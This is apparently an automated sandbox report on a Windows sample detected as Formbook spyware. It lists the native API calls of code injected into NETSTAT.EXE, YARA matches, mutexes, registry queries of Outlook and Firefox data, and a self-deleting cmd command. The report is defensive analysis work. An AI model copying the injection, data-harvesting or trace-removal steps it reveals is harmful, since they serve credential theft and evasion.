          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 5_2_034BA6D0 NtCreateProcessEx,5_2_034BA6D0
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 5_2_03525EFB NtQueryValueKey,NtClose,5_2_03525EFB
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 5_2_034F76FC NtQueryVirtualMemory,5_2_034F76FC
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 5_2_03533E96 NtAllocateVirtualMemory,5_2_03533E96
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 5_2_03501689 NtQueryInformationProcess,5_2_03501689
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 5_2_035016B6 NtQueryInformationProcess,5_2_035016B6
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 5_2_034A46A4 NtQueryInformationProcess,5_2_034A46A4
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 5_2_03472EBF NtClose,5_2_03472EBF
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 5_2_034A66B4 NtFreeVirtualMemory,NtFreeVirtualMemory,5_2_034A66B4
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 5_2_034BBD40 NtSuspendThread,5_2_034BBD40
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 5_2_034B2D5C NtProtectVirtualMemory,5_2_034B2D5C
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 5_2_034F6D65 NtQuerySystemInformation,5_2_034F6D65
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 5_2_0348CD70 NtQueryVirtualMemory,5_2_0348CD70
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 5_2_03501516 NtFreeVirtualMemory,5_2_03501516
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 5_2_034AFD13 NtUnmapViewOfSection,5_2_034AFD13
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 5_2_034AE52F NtClose,NtClose,5_2_034AE52F
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 5_2_034BA520 NtEnumerateKey,5_2_034BA520
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 5_2_034FF5C8 NtProtectVirtualMemory,5_2_034FF5C8
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 5_2_034ABDF2 NtProtectVirtualMemory,5_2_034ABDF2
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 5_2_035265EA NtQueryVirtualMemory,5_2_035265EA
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 5_2_034BA5F0 NtReadVirtualMemory,5_2_034BA5F0
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 5_2_03545595 NtQueryInformationToken,5_2_03545595
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 5_2_0349F591 NtClose,5_2_0349F591
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 5_2_034BA5A0 NtWriteVirtualMemory,5_2_034BA5A0
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 5_2_034F65A3 NtClose,5_2_034F65A3
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 5_2_03472DAA NtWaitForSingleObject,5_2_03472DAA
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 5_2_034B8442 NtAllocateVirtualMemory,5_2_034B8442
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 5_2_034A245F NtAllocateVirtualMemory,NtQueryVirtualMemory,5_2_034A245F
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 5_2_0347AC6E NtQueryInformationProcess,5_2_0347AC6E
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 5_2_034BA460 NtOpenProcess,5_2_034BA460
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 5_2_03497C7D NtClose,5_2_03497C7D
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 5_2_034A547E NtAllocateVirtualMemory,NtQueryVirtualMemory,5_2_034A547E
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 5_2_034BB470 NtOpenThread,5_2_034BB470
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 5_2_03501408 NtCreateSection,NtMapViewOfSection,NtUnmapViewOfSection,NtClose,5_2_03501408
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 5_2_0353EC09 NtFreeVirtualMemory,NtFreeVirtualMemory,5_2_0353EC09
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 5_2_034BB410 NtOpenProcessToken,5_2_034BB410
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 5_2_034A242B NtQueryVirtualMemory,5_2_034A242B
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 5_2_0349F42B NtCreateSection,NtClose,NtClose,5_2_0349F42B
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 5_2_0348A423 NtProtectVirtualMemory,5_2_0348A423
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 5_2_034BA430 NtQueryVirtualMemory,5_2_034BA430
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 5_2_035034C9 NtClose,NtQueryValueKey,NtQueryValueKey,NtEnumerateValueKey,5_2_035034C9
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 5_2_03500C82 NtUnmapViewOfSection,NtClose,NtClose,NtClose,NtClose,NtClose,5_2_03500C82
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 5_2_034BA4A0 NtUnmapViewOfSection,5_2_034BA4A0
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 5_2_032B6BC0 NtCreateFile,5_2_032B6BC0
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 5_2_032B6DA0 NtAllocateVirtualMemory,5_2_032B6DA0
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 5_2_032B6C70 NtReadFile,5_2_032B6C70
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 5_2_032B6CF0 NtClose,5_2_032B6CF0
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 5_2_032B6BBA NtCreateFile,5_2_032B6BBA
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 5_2_032B6C12 NtReadFile,5_2_032B6C12
          Source: C:\Users\user\Desktop\druS9vVaUK.exeCode function: 0_2_00C800F80_2_00C800F8
          Source: C:\Users\user\Desktop\druS9vVaUK.exeCode function: 0_2_00C81C7C0_2_00C81C7C
          Source: C:\Users\user\Desktop\druS9vVaUK.exeCode function: 0_2_00C87DC00_2_00C87DC0
          Source: C:\Users\user\Desktop\druS9vVaUK.exeCode function: 0_2_00C801D60_2_00C801D6
          Source: C:\Users\user\Desktop\druS9vVaUK.exeCode function: 0_2_00C82AD80_2_00C82AD8
          Source: C:\Users\user\Desktop\druS9vVaUK.exeCode function: 0_2_00C89A000_2_00C89A00
          Source: C:\Users\user\Desktop\druS9vVaUK.exeCode function: 0_2_00C892180_2_00C89218
          Source: C:\Users\user\Desktop\druS9vVaUK.exeCode function: 0_2_00C80BE00_2_00C80BE0
          Source: C:\Users\user\Desktop\druS9vVaUK.exeCode function: 0_2_00C813A00_2_00C813A0
          Source: C:\Users\user\Desktop\druS9vVaUK.exeCode function: 0_2_00C844930_2_00C84493
          Source: C:\Users\user\Desktop\druS9vVaUK.exeCode function: 0_2_00C8D0780_2_00C8D078
          Source: C:\Users\user\Desktop\druS9vVaUK.exeCode function: 0_2_00C8940C0_2_00C8940C
          Source: C:\Users\user\Desktop\druS9vVaUK.exeCode function: 0_2_00C8801C0_2_00C8801C
          Source: C:\Users\user\Desktop\druS9vVaUK.exeCode function: 0_2_00C894100_2_00C89410
          Source: C:\Users\user\Desktop\druS9vVaUK.exeCode function: 0_2_00C8C8100_2_00C8C810
          Source: C:\Users\user\Desktop\druS9vVaUK.exeCode function: 0_2_00C880200_2_00C88020
          Source: C:\Users\user\Desktop\druS9vVaUK.exeCode function: 0_2_00C838380_2_00C83838
          Source: C:\Users\user\Desktop\druS9vVaUK.exeCode function: 0_2_00C838300_2_00C83830
          Source: C:\Users\user\Desktop\druS9vVaUK.exeCode function: 0_2_00C858340_2_00C85834
          Source: C:\Users\user\Desktop\druS9vVaUK.exeCode function: 0_2_00C885CC0_2_00C885CC
          Source: C:\Users\user\Desktop\druS9vVaUK.exeCode function: 0_2_00C885D00_2_00C885D0
          Source: C:\Users\user\Desktop\druS9vVaUK.exeCode function: 0_2_00C849980_2_00C84998
          Source: C:\Users\user\Desktop\druS9vVaUK.exeCode function: 0_2_00C849950_2_00C84995
          Source: C:\Users\user\Desktop\druS9vVaUK.exeCode function: 0_2_00C801BD0_2_00C801BD
          Source: C:\Users\user\Desktop\druS9vVaUK.exeCode function: 0_2_00C84D580_2_00C84D58
          Source: C:\Users\user\Desktop\druS9vVaUK.exeCode function: 0_2_00C82AD10_2_00C82AD1
          Source: C:\Users\user\Desktop\druS9vVaUK.exeCode function: 0_2_00C8F2400_2_00C8F240
          Source: C:\Users\user\Desktop\druS9vVaUK.exeCode function: 0_2_00C892110_2_00C89211
          Source: C:\Users\user\Desktop\druS9vVaUK.exeCode function: 0_2_00C8022E0_2_00C8022E
          Source: C:\Users\user\Desktop\druS9vVaUK.exeCode function: 0_2_00C88BC00_2_00C88BC0
          Source: C:\Users\user\Desktop\druS9vVaUK.exeCode function: 0_2_00C80BD80_2_00C80BD8
          Source: C:\Users\user\Desktop\druS9vVaUK.exeCode function: 0_2_00C847B80_2_00C847B8
          Source: C:\Users\user\Desktop\druS9vVaUK.exeCode function: 0_2_00C84BB80_2_00C84BB8
          Source: C:\Users\user\Desktop\druS9vVaUK.exeCode function: 0_2_00C847B30_2_00C847B3
          Source: C:\Users\user\Desktop\druS9vVaUK.exeCode function: 0_2_00C84BB30_2_00C84BB3
          Source: C:\Users\user\Desktop\druS9vVaUK.exeCode function: 0_2_00C88B6C0_2_00C88B6C
          Source: C:\Users\user\Desktop\druS9vVaUK.exeCode function: 2_2_0041B0DB2_2_0041B0DB
          Source: C:\Users\user\Desktop\druS9vVaUK.exeCode function: 2_2_004078EB2_2_004078EB
          Source: C:\Users\user\Desktop\druS9vVaUK.exeCode function: 2_2_004078F02_2_004078F0
          Source: C:\Users\user\Desktop\druS9vVaUK.exeCode function: 2_2_0041AB5A2_2_0041AB5A
          Source: C:\Users\user\Desktop\druS9vVaUK.exeCode function: 2_2_00419D312_2_00419D31
          Source: C:\Users\user\Desktop\druS9vVaUK.exeCode function: 2_2_0041A7422_2_0041A742
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 5_2_0349FB405_2_0349FB40
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 5_2_034A63C25_2_034A63C2
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 5_2_0347EBE05_2_0347EBE0
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 5_2_034A4B965_2_034A4B96
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 5_2_034A4A5B5_2_034A4A5B
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 5_2_0354E2145_2_0354E214
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 5_2_03530A025_2_03530A02
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 5_2_034A523D5_2_034A523D
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 5_2_035422DD5_2_035422DD
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 5_2_03541A995_2_03541A99
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 5_2_034942B05_2_034942B0
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 5_2_034A594B5_2_034A594B
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 5_2_034A71105_2_034A7110
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 5_2_035419E25_2_035419E2
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 5_2_034A61805_2_034A6180
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 5_2_0354D9BE5_2_0354D9BE
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 5_2_034A10705_2_034A1070
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 5_2_0353D0165_2_0353D016
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 5_2_034AE0205_2_034AE020
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 5_2_034A00215_2_034A0021
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 5_2_034A48CB5_2_034A48CB
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 5_2_035428E85_2_035428E8
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 5_2_0348A0805_2_0348A080
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 5_2_035218B65_2_035218B6
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 5_2_035417465_2_03541746
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 5_2_03541FCE5_2_03541FCE
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 5_2_035327825_2_03532782
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 5_2_034957905_2_03495790
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 5_2_034976405_2_03497640
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 5_2_034A4E615_2_034A4E61
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 5_2_0353CE665_2_0353CE66
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 5_2_034A5E705_2_034A5E70
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 5_2_034A66115_2_034A6611
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 5_2_035426F85_2_035426F8
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 5_2_03533E965_2_03533E96
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 5_2_03470D405_2_03470D40
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 5_2_03531D1B5_2_03531D1B
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 5_2_035425195_2_03542519
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 5_2_0351C53F5_2_0351C53F
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 5_2_034915305_2_03491530
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 5_2_0353D5D25_2_0353D5D2
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 5_2_0352FDDB5_2_0352FDDB
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 5_2_03521DE35_2_03521DE3
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 5_2_0353E5815_2_0353E581
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 5_2_034A547E5_2_034A547E
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 5_2_0348740C5_2_0348740C
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 5_2_034914105_2_03491410
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 5_2_0352F42B5_2_0352F42B
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 5_2_035344EF5_2_035344EF
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 5_2_035334905_2_03533490
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 5_2_03541C9F5_2_03541C9F
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 5_2_032BAB5A5_2_032BAB5A
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 5_2_032A78EB5_2_032A78EB
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 5_2_032A78F05_2_032A78F0
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 5_2_032BB0DB5_2_032BB0DB
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: String function: 0347B0E0 appears 168 times
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: String function: 034CDDE8 appears 34 times
          Source: druS9vVaUK.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
          Source: axh0nv7nt03do.exe.3.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
          Source: druS9vVaUK.exeBinary or memory string: OriginalFilename vs druS9vVaUK.exe
          Source: druS9vVaUK.exe, 00000000.00000002.444726602.0000000000C90000.00000004.00000020.sdmpBinary or memory string: OriginalFilenamemscorwks.dllT vs druS9vVaUK.exe
          Source: druS9vVaUK.exe, 00000000.00000002.443094538.0000000000518000.00000002.00020000.sdmpBinary or memory string: OriginalFilenameKnCXSjRjkQbpf.exe0 vs druS9vVaUK.exe
          Source: druS9vVaUK.exe, 00000000.00000002.453041651.0000000008880000.00000002.00000001.sdmpBinary or memory string: OriginalFilenamemscorrc.dllT vs druS9vVaUK.exe
          Source: druS9vVaUK.exe, 00000000.00000002.446398805.0000000002B00000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameRuntimeCore.dll8 vs druS9vVaUK.exe
          Source: druS9vVaUK.exe, 00000002.00000002.500225053.00000000004F8000.00000002.00020000.sdmpBinary or memory string: OriginalFilenameKnCXSjRjkQbpf.exe0 vs druS9vVaUK.exe
          Source: druS9vVaUK.exe, 00000002.00000002.503364248.000000000119F000.00000040.00000001.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs druS9vVaUK.exe
          Source: druS9vVaUK.exe, 00000002.00000002.500676997.00000000005F0000.00000040.00000001.sdmpBinary or memory string: OriginalFilenamenetstat.exej% vs druS9vVaUK.exe
          Source: druS9vVaUK.exeBinary or memory string: OriginalFilenameKnCXSjRjkQbpf.exe0 vs druS9vVaUK.exe
          Source: C:\Windows\SysWOW64\NETSTAT.EXERegistry key queried: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Mozilla\Mozilla Firefox\63.0.3 (x86 en-US)\Main Install DirectoryJump to behavior
          Source: 00000005.00000002.847404146.00000000001D0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000005.00000002.847404146.00000000001D0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000002.00000002.501814607.0000000000EB0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000002.00000002.501814607.0000000000EB0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000002.00000002.501038766.0000000000A90000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000002.00000002.501038766.0000000000A90000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000005.00000002.852694551.00000000032A0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000005.00000002.852694551.00000000032A0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000002.00000002.499850983.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000002.00000002.499850983.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000000.00000002.453585348.0000000009125000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000000.00000002.453585348.0000000009125000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 2.2.druS9vVaUK.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 2.2.druS9vVaUK.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 2.2.druS9vVaUK.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 2.2.druS9vVaUK.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: druS9vVaUK.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
          Source: axh0nv7nt03do.exe.3.drStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
          Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@9/7@3/2
          Source: C:\Users\user\Desktop\druS9vVaUK.exeCode function: 0_2_00BCA70E AdjustTokenPrivileges,0_2_00BCA70E
          Source: C:\Users\user\Desktop\druS9vVaUK.exeCode function: 0_2_00BCA6D7 AdjustTokenPrivileges,0_2_00BCA6D7
          Source: C:\Users\user\Desktop\druS9vVaUK.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v2.0_32\UsageLogs\druS9vVaUK.exe.logJump to behavior
          Source: C:\Users\user\Desktop\druS9vVaUK.exeMutant created: \Sessions\1\BaseNamedObjects\VdLINVBOKOiFSfVNXuAoBmCBmda
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3604:120:WilError_01
          Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Local\Temp\TtrexqptJump to behavior
          Source: druS9vVaUK.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
          Source: C:\Users\user\Desktop\druS9vVaUK.exeSection loaded: C:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\497ab1dd171eeef956401f1aeb0b9fec\mscorlib.ni.dllJump to behavior
          Source: C:\Users\user\Desktop\druS9vVaUK.exeSection loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlpJump to behavior
          Source: C:\Users\user\Desktop\druS9vVaUK.exeSection loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlpJump to behavior
          Source: C:\Program Files (x86)\Ttrexqpt\axh0nv7nt03do.exeSection loaded: C:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\497ab1dd171eeef956401f1aeb0b9fec\mscorlib.ni.dllJump to behavior
          Source: C:\Program Files (x86)\Ttrexqpt\axh0nv7nt03do.exeSection loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlpJump to behavior
          Source: C:\Program Files (x86)\Ttrexqpt\axh0nv7nt03do.exeSection loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlpJump to behavior
          Source: C:\Windows\explorer.exeFile read: C:\Users\desktop.iniJump to behavior
          Source: C:\Users\user\Desktop\druS9vVaUK.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
          Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Windows\SysWOW64\NETSTAT.EXEFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: druS9vVaUK.exeVirustotal: Detection: 33%
          Source: druS9vVaUK.exeReversingLabs: Detection: 35%
          Source: unknownProcess created: C:\Users\user\Desktop\druS9vVaUK.exe 'C:\Users\user\Desktop\druS9vVaUK.exe'
          Source: unknownProcess created: C:\Users\user\Desktop\druS9vVaUK.exe {path}
          Source: unknownProcess created: C:\Windows\SysWOW64\NETSTAT.EXE C:\Windows\SysWOW64\NETSTAT.EXE
          Source: unknownProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\druS9vVaUK.exe'
          Source: unknownProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: unknownProcess created: C:\Program Files (x86)\Ttrexqpt\axh0nv7nt03do.exe 'C:\Program Files (x86)\Ttrexqpt\axh0nv7nt03do.exe'
          Source: C:\Users\user\Desktop\druS9vVaUK.exeProcess created: C:\Users\user\Desktop\druS9vVaUK.exe {path}Jump to behavior
          Source: C:\Windows\explorer.exeProcess created: C:\Program Files (x86)\Ttrexqpt\axh0nv7nt03do.exe 'C:\Program Files (x86)\Ttrexqpt\axh0nv7nt03do.exe' Jump to behavior
          Source: C:\Windows\SysWOW64\NETSTAT.EXEProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\druS9vVaUK.exe'Jump to behavior
          Source: C:\Windows\explorer.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{9FC8E510-A27C-4B3B-B9A3-BF65F00256A8}\InProcServer32Jump to behavior
          Source: C:\Windows\SysWOW64\NETSTAT.EXEFile written: C:\Users\user\AppData\Roaming\940NNO9F\940logri.iniJump to behavior
          Source: Window RecorderWindow detected: More than 3 window changes detected
          Source: C:\Users\user\Desktop\druS9vVaUK.exeFile opened: C:\Windows\Microsoft.NET\Framework\v2.0.50727\mscorrc.dllJump to behavior
          Source: C:\Windows\SysWOW64\NETSTAT.EXEKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\Jump to behavior
          Source: druS9vVaUK.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
          Source: C:\Users\user\Desktop\druS9vVaUK.exeFile opened: C:\Windows\WinSxS\x86_microsoft.vc80.crt_1fc8b3b9a1e18e3b_8.0.50727.9445_none_d08c58b4442ba54f\MSVCR80.dllJump to behavior
          Source: druS9vVaUK.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
          Source: Binary string: netstat.pdbGCTL source: druS9vVaUK.exe, 00000002.00000002.500676997.00000000005F0000.00000040.00000001.sdmp
          Source: Binary string: netstat.pdb source: druS9vVaUK.exe, 00000002.00000002.500676997.00000000005F0000.00000040.00000001.sdmp
          Source: Binary string: wntdll.pdbUGP source: druS9vVaUK.exe, 00000002.00000002.502552428.000000000100F000.00000040.00000001.sdmp, NETSTAT.EXE, 00000005.00000002.853545081.000000000356F000.00000040.00000001.sdmp
